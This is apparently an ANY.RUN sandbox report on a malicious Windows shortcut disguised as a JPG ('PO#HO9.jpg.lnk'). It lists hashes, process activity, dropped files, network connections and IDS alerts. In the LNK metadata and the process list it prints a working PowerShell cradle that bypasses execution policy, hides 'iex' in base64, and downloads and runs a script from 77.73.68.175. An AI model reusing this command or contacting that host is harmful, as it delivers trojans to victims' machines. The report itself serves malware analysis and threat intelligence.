analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PO#HO9.jpg.lnk

Full analysis: https://app.any.run/tasks/14a5868f-79ba-414f-beb7-216fb6797edf
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: March 22, 2019, 10:00:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
opendir
Indicators:
MIME: application/octet-stream
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=67, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
MD5:

8CD1E7208641D4C1050A8CED8BEC48BF

SHA1:

45606E8F77A03049ADB30DEF7CE5F47865FEFACB

SHA256:

C502EF4E4926DE9DF49CF283E2A17898ED3935E4868275B5FFCE0A5AFDB356DB

SSDEEP:

24:8itnHYVKVWhe/CWMlCThf8AkZJhmMFDAlZuPzKEl/0Xe/E4I0arabvtSO:8EHaX1AQ1AKPzF/EgIZaxSO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • rpyt.exe (PID: 2964)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2628)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2628)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 67
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
Description: hpDMCiq
RelativePath: ..\..\..\..\..\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
WorkingDirectory: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0
CommandLineArguments: -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://77.73.68.175/LUvUtvw/out-1056554340.ps1');ext $wbB
IconFileName: C:\WINDOWS\System32\imageres.dll
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
2
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start powershell.exe rpyt.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2628"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://77.73.68.175/LUvUtvw/out-1056554340.ps1');ext $wbBC:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2964"C:\Users\Public\rpyt.exe"C:\Users\Public\rpyt.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
retries
Exit code:
0
Version:
1.0.0.0
Total events
311
Read events
246
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2628powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PTGFWIFLGX0AT7ZHST8W.temp
MD5:
SHA256:
2628powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b2677854bb84f693.customDestinations-msbinary
MD5:5F20552C1C6819EDF06175C6BD593AB1
SHA256:1F5C7C95CA55497DD82F64A0025863EAB3E6C65E79E7F244E3F737AC548C9535
2628powershell.exeC:\Users\Public\rpyt.exeexecutable
MD5:548A99B04E66F67A69DB51001CFA7864
SHA256:3BBAFA27C6CE667C412A1F830213D10EE5CE1B99960E612D3A5349D1AA5BCF06
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2628
powershell.exe
GET
200
77.73.68.175:80
http://77.73.68.175/LUvUtvw/out-1056554340.ps1
RU
text
1.23 Mb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2628
powershell.exe
77.73.68.175:80
OOO Fishnet Communications
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
2628
powershell.exe
A Network Trojan was detected
ET TROJAN Windows executable base64 encoded
2628
powershell.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable base64 Payload
1 ETPRO signatures available at the full report
No debug info